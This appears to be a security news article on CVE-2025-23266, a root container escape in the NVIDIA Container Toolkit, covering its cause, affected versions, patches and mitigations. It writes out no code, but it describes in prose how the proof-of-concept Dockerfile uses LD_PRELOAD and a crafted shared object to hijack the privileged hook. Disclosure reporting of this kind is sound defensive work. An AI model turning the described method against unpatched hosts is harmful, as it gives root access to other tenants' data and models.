A critical security flaw in the NVIDIA Container Toolkit (NCT) the foundational software powering many cloud-based AI and GPU services has been disclosed by Wiz Research, raising alarm across the AI and cloud computing sectors.
The vulnerability, now tracked as CVE-2025-23266 and carrying a CVSS score of 9.0 (Critical), enables containerized attackers to escape isolation controls and seize full root access on the host machine.
The attack boils down to a subtle but impactful misconfiguration in how the toolkit handles OCI hooks, and researchers have demonstrated that it can be exploited with little more than a three-line Dockerfile.
Systemic Risk to Cloud AI Infrastructure
NVIDIA Container Toolkit facilitates access between containerized workloads and GPU hardware, playing a pivotal role in managed AI services offered by every major cloud provider, including environments where customers run their own containerized AI workloads on shared hardware.
The risk is particularly acute when services are multi-tenant: a malicious customer could build a container image engineered to exploit CVE-2025-23266 and break out with root privileges to the host node.

This breach would grant attackers potential access to sensitive data, proprietary models, and workloads of all other tenants on the same hardware a threat vector with the potential to destabilize large-scale AI offerings globally.
Wiz Research’s technical analysis reveals that the vulnerability pivots on the interaction of OCI “createContainer” hooks with environment variables that are inherited from the container image contrary to common secure engineering assumptions.
The NVIDIA toolkit’s privileged createContainer hook, designed to configure GPU access before a container launches, inappropriately inherits values such as LD_PRELOAD from untrusted containers.
By placing a malicious shared object inside the container and setting LD_PRELOAD to load it, the attacker ensures that the next container launch hijacks the privileged NVIDIA hook, running their code with root-level host permissions.
CVE-2025-23266 Disclosure
The proof-of-concept exploit underscoring the severity of the bug consists of a minimalist Dockerfile: importing a benign-looking base image, setting the LD_PRELOAD environmental variable, and copying in a crafted shared object.
When a user runs such a container with vulnerable toolkit versions (up to and including NCT v1.17.7, or in CDI mode for versions prior to v1.17.5, as well as GPU Operator up to 25.3.1), the NVIDIA “nvidia-ctk” process is subverted, resulting in a full host escape.
The payload can then perform any action under root, such as exfiltrating local data or implanting persistent malware. NVIDIA has responded swiftly, issuing patches and detailed mitigation steps.
Organizations are urged to immediately upgrade to the latest NVIDIA Container Toolkit and GPU Operator releases, as recommended in NVIDIA’s coordinated security bulletin.
For those unable to update promptly, a temporary solution involves disabling the “enable-cuda-compat” hook via configuration changes in either the toolkit’s config files or, for Kubernetes clusters, by setting the appropriate environment variables in GPU Operator Helm charts.
Additionally, organizations are advised to inventory their environments to identify all potentially vulnerable systems, especially those running containers built from untrusted or public images. Wiz Research underscores that internet exposure is not the critical attack vector here.
Rather, the principal risk surfaces wherever users can run arbitrary container images whether by social engineering developers, via compromised supply chains, or through workflows that allow importing external workloads.
The release hammers home that, as the AI industry races forward, the most immediate security threats are rooted in core infrastructure and supply chain weaknesses not in speculative, futuristic AI-driven attacks.
The researchers call for a mature and vigilant approach to the security of AI infrastructure, built on tight collaboration between security and engineering teams and rigorous scrutiny on the provenance of all software in the AI stack.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates